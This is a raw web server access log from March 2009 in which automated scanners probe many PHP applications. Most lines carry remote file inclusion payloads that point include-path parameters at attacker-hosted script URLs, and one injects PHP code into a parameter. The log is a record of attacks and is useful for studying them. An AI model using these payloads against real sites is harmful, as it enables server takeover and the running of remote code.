65.254.51.178 - - [07/Mar/2009:02:00:33 -0600] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.814"
66.225.253.109 - - [07/Mar/2009:02:02:01 -0600] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 326 "-""libwww-perl/5.810"
66.225.253.109 - - [07/Mar/2009:02:02:01 -0600] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
122.100.5.82 - - [07/Mar/2009:02:15:09 -0600] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.gainwealth.com.my/administrator/images/angry.gif??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
122.100.5.82 - - [07/Mar/2009:02:15:09 -0600] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.gainwealth.com.my/administrator/images/angry.gif??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
122.100.5.82 - - [07/Mar/2009:02:15:09 -0600] "GET /logs/access_log.1233792000//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.gainwealth.com.my/administrator/images/angry.gif??? HTTP/1.1" 404 358 "-""Mozilla/5.0"
122.100.5.82 - - [07/Mar/2009:02:15:14 -0600] "GET /logs/access_log.1234569600//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.gainwealth.com.my/administrator/images/angry.gif??? HTTP/1.1" 404 358 "-""Mozilla/5.0"
122.100.5.82 - - [07/Mar/2009:02:15:16 -0600] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.gainwealth.com.my/administrator/images/angry.gif??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
122.100.5.82 - - [07/Mar/2009:02:15:16 -0600] "GET /logs/access_log.1233792000//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.gainwealth.com.my/administrator/images/angry.gif??? HTTP/1.1" 404 358 "-""Mozilla/5.0"
122.100.5.82 - - [07/Mar/2009:02:15:16 -0600] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.gainwealth.com.my/administrator/images/angry.gif??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
122.100.5.82 - - [07/Mar/2009:02:15:17 -0600] "GET /logs/access_log.1234569600//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.gainwealth.com.my/administrator/images/angry.gif??? HTTP/1.1" 404 358 "-""Mozilla/5.0"
81.12.13.152 - - [07/Mar/2009:02:18:39 -0600] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.vendo-sito.com//themes/idfx1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
81.12.13.152 - - [07/Mar/2009:02:18:39 -0600] "GET /logs/access_log.1233792000//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.vendo-sito.com//themes/idfx1.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
81.12.13.152 - - [07/Mar/2009:02:18:39 -0600] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.vendo-sito.com//themes/idfx1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
81.12.13.152 - - [07/Mar/2009:02:18:46 -0600] "GET /logs/access_log.1234569600//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.vendo-sito.com//themes/idfx1.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
87.101.4.42 - - [07/Mar/2009:02:19:00 -0600] "GET //include/scripts/export_batch.inc.php?DIR=http://www.und-die-sieben-zwerge.de/roster/addons/siggen/siggen.do?%0D?? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
87.101.4.42 - - [07/Mar/2009:02:19:00 -0600] "GET /logs//include/scripts/export_batch.inc.php?DIR=http://www.und-die-sieben-zwerge.de/roster/addons/siggen/siggen.do?%0D?? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
65.55.208.121 - - [07/Mar/2009:02:19:01 -0600] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
81.12.13.152 - - [07/Mar/2009:02:19:01 -0600] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.vendo-sito.com//themes/idfx1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
81.12.13.152 - - [07/Mar/2009:02:19:01 -0600] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.vendo-sito.com//themes/idfx1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
81.12.13.152 - - [07/Mar/2009:02:19:01 -0600] "GET /logs/access_log.1233792000//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.vendo-sito.com//themes/idfx1.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
65.55.208.121 - - [07/Mar/2009:02:19:01 -0600] "GET /logs/access_log.1117843200 HTTP/1.1" 200 994 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.121 - - [07/Mar/2009:02:19:02 -0600] "GET /logs/access_log.1160438400 HTTP/1.1" 200 1454 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.121 - - [07/Mar/2009:02:19:02 -0600] "GET /logs/access_log.1188864000 HTTP/1.1" 200 1894 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
218.246.20.221 - - [07/Mar/2009:02:19:07 -0600] "GET /logs/access_log.1233792000//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://gumansin.com/id.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
218.246.20.221 - - [07/Mar/2009:02:19:07 -0600] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://gumansin.com/id.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
218.246.20.221 - - [07/Mar/2009:02:19:10 -0600] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://gumansin.com/id.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
81.12.13.152 - - [07/Mar/2009:02:19:12 -0600] "GET /logs/access_log.1234569600//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.vendo-sito.com//themes/idfx1.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
218.246.20.221 - - [07/Mar/2009:02:21:37 -0600] "GET /logs/access_log.1234569600//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://gumansin.com/id.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
208.71.89.60 - - [07/Mar/2009:02:27:23 -0600] "GET //include/admin.lib.inc.php?site_path=http://www.tecsisnet-learning.it/FAD/copyright.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
208.71.89.60 - - [07/Mar/2009:02:27:23 -0600] "GET /logs//include/admin.lib.inc.php?site_path=http://www.tecsisnet-learning.it/FAD/copyright.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
208.71.89.60 - - [07/Mar/2009:02:27:23 -0600] "GET /logs/access_log.1228867200//include/admin.lib.inc.php?site_path=http://www.tecsisnet-learning.it/FAD/copyright.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
81.12.13.152 - - [07/Mar/2009:02:34:09 -0600] "GET //include/write.php?dir=http://www.vendo-sito.com//themes/idfx1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
81.12.13.152 - - [07/Mar/2009:02:34:09 -0600] "GET /logs//include/write.php?dir=http://www.vendo-sito.com//themes/idfx1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
81.12.13.152 - - [07/Mar/2009:02:34:09 -0600] "GET /logs/access_log.1231286400//include/write.php?dir=http://www.vendo-sito.com//themes/idfx1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
81.12.13.152 - - [07/Mar/2009:02:34:26 -0600] "GET /logs/access_log.1231804800//include/write.php?dir=http://www.vendo-sito.com//themes/idfx1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
81.12.13.152 - - [07/Mar/2009:02:34:52 -0600] "GET //include/write.php?dir=http://www.vendo-sito.com//themes/idfx1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
81.12.13.152 - - [07/Mar/2009:02:34:52 -0600] "GET /logs//include/write.php?dir=http://www.vendo-sito.com//themes/idfx1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
81.12.13.152 - - [07/Mar/2009:02:34:52 -0600] "GET /logs/access_log.1231286400//include/write.php?dir=http://www.vendo-sito.com//themes/idfx1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
81.12.13.152 - - [07/Mar/2009:02:35:39 -0600] "GET /logs/access_log.1231804800//include/write.php?dir=http://www.vendo-sito.com//themes/idfx1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
66.225.253.109 - - [07/Mar/2009:02:35:44 -0600] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.810"
66.225.253.109 - - [07/Mar/2009:02:35:46 -0600] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.810"
189.28.179.166 - - [07/Mar/2009:02:40:24 -0600] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.dr52.co.kr//data/db/id3.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.803"
189.28.179.166 - - [07/Mar/2009:02:40:24 -0600] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.dr52.co.kr//data/db/id3.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.803"
189.28.179.166 - - [07/Mar/2009:02:41:23 -0600] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dr52.co.kr//data/db/id3.txt??? HTTP/1.1" 404 346 "-""libwww-perl/5.803"
189.28.179.166 - - [07/Mar/2009:02:41:23 -0600] "GET //technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dr52.co.kr//data/db/id3.txt??? HTTP/1.1" 404 341 "-""libwww-perl/5.803"
87.101.4.49 - - [07/Mar/2009:02:42:00 -0600] "GET //init_basic.php?GALLERY_BASEDIR=http://weko.co.kr/data/file/notice/test.txt??%0D?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
87.101.4.49 - - [07/Mar/2009:02:42:00 -0600] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://weko.co.kr/data/file/notice/test.txt??%0D?? HTTP/1.1" 404 303 "-""libwww-perl/5.79"
66.225.253.109 - - [07/Mar/2009:03:07:52 -0600] "GET /logs//include/lib.inc.php?site_path=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.810"
66.225.253.109 - - [07/Mar/2009:03:07:52 -0600] "GET //include/lib.inc.php?site_path=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.810"
209.11.246.11 - - [07/Mar/2009:03:11:14 -0600] "GET /logs//search.php?include_dir=http://jiahn.com/ktools_v1/ktools/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
209.11.246.11 - - [07/Mar/2009:03:11:14 -0600] "GET //search.php?include_dir=http://jiahn.com/ktools_v1/ktools/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
194.177.224.21 - - [07/Mar/2009:03:29:22 -0600] "GET /logs/contenido/includes/include.con_subnav.php?cfg[path][contenido]=http://vncgroup.com.br/fx29id.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
194.177.224.21 - - [07/Mar/2009:03:29:22 -0600] "GET /logs/access_log.1233619200/contenido/includes/include.con_subnav.php?cfg[path][contenido]=http://vncgroup.com.br/fx29id.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
194.177.224.21 - - [07/Mar/2009:03:29:22 -0600] "GET /contenido/includes/include.con_subnav.php?cfg[path][contenido]=http://vncgroup.com.br/fx29id.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
70.38.71.140 - - [07/Mar/2009:03:41:06 -0600] "GET /logs/main.php?pagina=http://vncgroup.com.br/fx29id.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
70.38.71.140 - - [07/Mar/2009:03:41:06 -0600] "GET /logs/access_log.1234828800/main.php?pagina=http://vncgroup.com.br/fx29id.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
70.38.71.140 - - [07/Mar/2009:03:41:06 -0600] "GET /main.php?pagina=http://vncgroup.com.br/fx29id.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
61.110.18.100 - - [07/Mar/2009:03:45:41 -0600] "GET /main.php?pagina=http://vncgroup.com.br/fx29id.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
61.110.18.100 - - [07/Mar/2009:03:45:41 -0600] "GET /logs/main.php?pagina=http://vncgroup.com.br/fx29id.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
61.110.18.100 - - [07/Mar/2009:03:45:41 -0600] "GET /logs/access_log.1234828800/main.php?pagina=http://vncgroup.com.br/fx29id.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
65.55.208.130 - - [07/Mar/2009:03:50:46 -0600] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.130 - - [07/Mar/2009:03:50:50 -0600] "GET /logs/access_log.1203724800 HTTP/1.1" 200 1280 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
74.124.198.146 - - [07/Mar/2009:04:27:43 -0600] "GET /?mosConfig_absolute_path=http://www.k-tv.at/oremus//contenido/cronjobs/cmd7.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
74.124.198.146 - - [07/Mar/2009:04:27:48 -0600] "GET /logs/?mosConfig_absolute_path=http://www.k-tv.at/oremus//contenido/cronjobs/cmd7.txt?? HTTP/1.1" 200 36689 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
203.160.1.73 - - [07/Mar/2009:04:38:16 -0600] "GET /logs/errors.php?error=http://marcio.eng.br/marcio/Arquivos/Cracker/ver??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
203.160.1.73 - - [07/Mar/2009:04:38:17 -0600] "GET /errors.php?error=http://marcio.eng.br/marcio/Arquivos/Cracker/ver??? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
194.177.224.21 - - [07/Mar/2009:04:40:25 -0600] "GET /main.php?pagina=http://vncgroup.com.br/fx29id.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
194.177.224.21 - - [07/Mar/2009:04:40:26 -0600] "GET /logs/main.php?pagina=http://vncgroup.com.br/fx29id.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
194.177.224.21 - - [07/Mar/2009:04:40:26 -0600] "GET /logs/access_log.1234828800/main.php?pagina=http://vncgroup.com.br/fx29id.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
207.58.164.77 - - [07/Mar/2009:04:41:40 -0600] "GET /logs//include/lib.inc.php?site_path=http://boostserver.com/fantastico/upload/bb/copyright.txt???? HTTP/1.1" 404 308 "-""Mozilla/5.0"
207.58.164.77 - - [07/Mar/2009:04:41:40 -0600] "GET /logs/access_log.1232150400//include/lib.inc.php?site_path=http://boostserver.com/fantastico/upload/bb/copyright.txt???? HTTP/1.1" 404 330 "-""Mozilla/5.0"
207.58.164.77 - - [07/Mar/2009:04:41:40 -0600] "GET //include/lib.inc.php?site_path=http://boostserver.com/fantastico/upload/bb/copyright.txt???? HTTP/1.1" 404 303 "-""Mozilla/5.0"
207.58.164.77 - - [07/Mar/2009:04:41:49 -0600] "GET /logs/access_log.1232928000//include/lib.inc.php?site_path=http://boostserver.com/fantastico/upload/bb/copyright.txt???? HTTP/1.1" 404 330 "-""Mozilla/5.0"
64.182.83.68 - - [07/Mar/2009:04:43:00 -0600] "GET /logs/access_log.1233792000//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://racrew.us/sophie/idfx1.txt?? HTTP/1.0" 404 346 "-""Mozilla/5.0"
64.182.83.68 - - [07/Mar/2009:04:43:00 -0600] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://racrew.us/sophie/idfx1.txt?? HTTP/1.0" 404 319 "-""Mozilla/5.0"
64.182.83.68 - - [07/Mar/2009:04:43:00 -0600] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://racrew.us/sophie/idfx1.txt?? HTTP/1.0" 404 324 "-""Mozilla/5.0"
64.182.83.68 - - [07/Mar/2009:04:43:03 -0600] "GET /logs/access_log.1233705600//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://racrew.us/sophie/idfx1.txt?? HTTP/1.0" 404 346 "-""Mozilla/5.0"
80.25.82.126 - - [07/Mar/2009:04:43:11 -0600] "GET /logs//include/lib.inc.php?site_path=http://www.amra.eu/kajak_backoffice/cutenews/TT?? HTTP/1.1" 404 308 "-""libwww-perl/5.76"
80.25.82.126 - - [07/Mar/2009:04:43:12 -0600] "GET //include/lib.inc.php?site_path=http://www.amra.eu/kajak_backoffice/cutenews/TT?? HTTP/1.1" 404 303 "-""libwww-perl/5.76"
72.52.213.40 - - [07/Mar/2009:04:45:25 -0600] "GET /logs//include/footer.php?_path[counter]=http://blog100.asia/survey//jpg/yes.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
72.52.213.40 - - [07/Mar/2009:04:45:25 -0600] "GET //include/footer.php?_path[counter]=http://blog100.asia/survey//jpg/yes.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.810"
65.254.49.34 - - [07/Mar/2009:04:45:31 -0600] "GET /logs//include/footer.php?_path[counter]=http://imagehut.ws/images2/raid.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
65.254.49.34 - - [07/Mar/2009:04:45:31 -0600] "GET //include/footer.php?_path[counter]=http://imagehut.ws/images2/raid.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.810"
85.18.117.101 - - [07/Mar/2009:04:46:54 -0600] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.kjbbc.net/bbs/scripts/id1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
85.18.117.101 - - [07/Mar/2009:04:46:54 -0600] "GET /logs/access_log.1230163200/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.kjbbc.net/bbs/scripts/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
85.18.117.101 - - [07/Mar/2009:04:46:54 -0600] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.kjbbc.net/bbs/scripts/id1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
67.19.130.218 - - [07/Mar/2009:04:52:39 -0600] "GET /logs//include/lib.inc.php?site_path=http://www.amra.eu/kajak_backoffice/cutenews/TT?? HTTP/1.1" 404 308 "-""libwww-perl/5.810"
67.19.130.218 - - [07/Mar/2009:04:52:39 -0600] "GET //include/lib.inc.php?site_path=http://www.amra.eu/kajak_backoffice/cutenews/TT?? HTTP/1.1" 404 303 "-""libwww-perl/5.810"
203.160.1.73 - - [07/Mar/2009:04:53:32 -0600] "GET /logs//include/lib.inc.php?site_path=http://marcio.eng.br/marcio/Arquivos/Cracker/ver??? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
203.160.1.73 - - [07/Mar/2009:04:53:32 -0600] "GET //include/lib.inc.php?site_path=http://marcio.eng.br/marcio/Arquivos/Cracker/ver??? HTTP/1.1" 404 303 "-""libwww-perl/5.79"
211.220.195.71 - - [07/Mar/2009:04:58:02 -0600] "GET /logs//modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://imagehut.ws/images/baner.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.220.195.71 - - [07/Mar/2009:04:58:02 -0600] "GET //modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://imagehut.ws/images/baner.jpg?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
211.220.195.71 - - [07/Mar/2009:04:58:02 -0600] "GET /logs/access_log.1233532800//modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://imagehut.ws/images/baner.jpg?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
207.226.88.17 - - [07/Mar/2009:05:02:24 -0600] "GET /logs/PNphpBB2/includes/errors.php?error=http://www.gosstroy.com/images/kampret.jpg?? HTTP/1.1" 404 316 "-""libwww-perl/5.79"
207.226.88.17 - - [07/Mar/2009:05:02:24 -0600] "GET /PNphpBB2/includes/errors.php?error=http://www.gosstroy.com/images/kampret.jpg?? HTTP/1.1" 404 311 "-""libwww-perl/5.79"
88.119.247.27 - - [07/Mar/2009:05:06:01 -0600] "GET /logs/access_log.1169683200 HTTP/1.0" 200 71611 "http://fortpit.pconline.com/logs/access_log.1169683200""Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
63.247.82.82 - - [07/Mar/2009:05:06:10 -0600] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://racrew.us/sophie/raid.txt?? HTTP/1.1" 404 346 "-""libwww-perl/5.810"
63.247.82.82 - - [07/Mar/2009:05:06:10 -0600] "GET //technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://racrew.us/sophie/raid.txt?? HTTP/1.1" 404 341 "-""libwww-perl/5.810"
77.221.130.26 - - [07/Mar/2009:05:07:11 -0600] "GET /logs/errors.php?error=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
77.221.130.26 - - [07/Mar/2009:05:07:11 -0600] "GET /logs/errors.php?error=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
77.221.130.26 - - [07/Mar/2009:05:07:11 -0600] "GET /errors.php?error=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
77.221.130.26 - - [07/Mar/2009:05:07:11 -0600] "GET /errors.php?error=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
65.55.230.164 - - [07/Mar/2009:05:07:40 -0600] "GET /logs/access_log.1227484800 HTTP/1.1" 200 22925 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.230.164 - - [07/Mar/2009:05:07:44 -0600] "GET /logs/access_log.1226275200 HTTP/1.1" 200 177702 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.230.164 - - [07/Mar/2009:05:07:54 -0600] "GET /logs/access_log.1226880000 HTTP/1.1" 200 10971 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.230.164 - - [07/Mar/2009:05:07:58 -0600] "GET /logs/access_log.1227398400 HTTP/1.1" 200 32615 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
81.169.162.47 - - [07/Mar/2009:05:10:10 -0600] "GET /logs//?view=page&pagename=http://old.no-mia.com/tjzwjhdtj/pqkewt/id? HTTP/1.1" 200 180672 "-""libwww-perl/5.806"
81.169.162.47 - - [07/Mar/2009:05:10:11 -0600] "GET //?view=page&pagename=http://old.no-mia.com/tjzwjhdtj/pqkewt/id? HTTP/1.1" 200 3245 "-""libwww-perl/5.806"
194.177.224.21 - - [07/Mar/2009:05:15:16 -0600] "GET //include/admin.lib.inc.php?site_path=http://www.ymti.org/de/xoops_lib/modules/protector/language/japanese/copyright.txt????? HTTP/1.1" 404 309 "-""Mozilla/5.0"
194.177.224.21 - - [07/Mar/2009:05:15:16 -0600] "GET /logs/access_log.1233878400//include/admin.lib.inc.php?site_path=http://www.ymti.org/de/xoops_lib/modules/protector/language/japanese/copyright.txt????? HTTP/1.1" 404 336 "-""Mozilla/5.0"
194.177.224.21 - - [07/Mar/2009:05:15:16 -0600] "GET /logs//include/admin.lib.inc.php?site_path=http://www.ymti.org/de/xoops_lib/modules/protector/language/japanese/copyright.txt????? HTTP/1.1" 404 314 "-""Mozilla/5.0"
194.177.224.21 - - [07/Mar/2009:05:16:13 -0600] "GET /logs/access_log.1234224000//include/admin.lib.inc.php?site_path=http://www.ymti.org/de/xoops_lib/modules/protector/language/japanese/copyright.txt????? HTTP/1.1" 404 336 "-""Mozilla/5.0"
195.137.140.179 - - [07/Mar/2009:05:16:17 -0600] "GET /logs/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://gumansin.com/id.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
195.137.140.179 - - [07/Mar/2009:05:16:17 -0600] "GET /include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://gumansin.com/id.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
195.137.140.179 - - [07/Mar/2009:05:16:18 -0600] "GET /logs/access_log.1232755200/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://gumansin.com/id.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
195.137.140.179 - - [07/Mar/2009:05:16:22 -0600] "GET /logs/access_log.1233792000/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://gumansin.com/id.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
195.137.140.179 - - [07/Mar/2009:05:16:23 -0600] "GET /include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://gumansin.com/id.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
195.137.140.179 - - [07/Mar/2009:05:16:23 -0600] "GET /logs/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://gumansin.com/id.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
195.137.140.179 - - [07/Mar/2009:05:16:23 -0600] "GET /logs/access_log.1233792000/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://gumansin.com/id.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
195.137.140.179 - - [07/Mar/2009:05:16:26 -0600] "GET /logs/access_log.1232755200/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://gumansin.com/id.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
195.137.140.179 - - [07/Mar/2009:05:16:29 -0600] "GET /logs/access_log.1233100800/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://gumansin.com/id.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
195.137.140.179 - - [07/Mar/2009:05:16:42 -0600] "GET /include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://gumansin.com/id.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
195.137.140.179 - - [07/Mar/2009:05:16:42 -0600] "GET /logs/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://gumansin.com/id.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
195.137.140.179 - - [07/Mar/2009:05:16:45 -0600] "GET /logs/access_log.1232755200/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://gumansin.com/id.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
195.137.140.179 - - [07/Mar/2009:05:16:53 -0600] "GET /logs/access_log.1233360000/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://gumansin.com/id.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
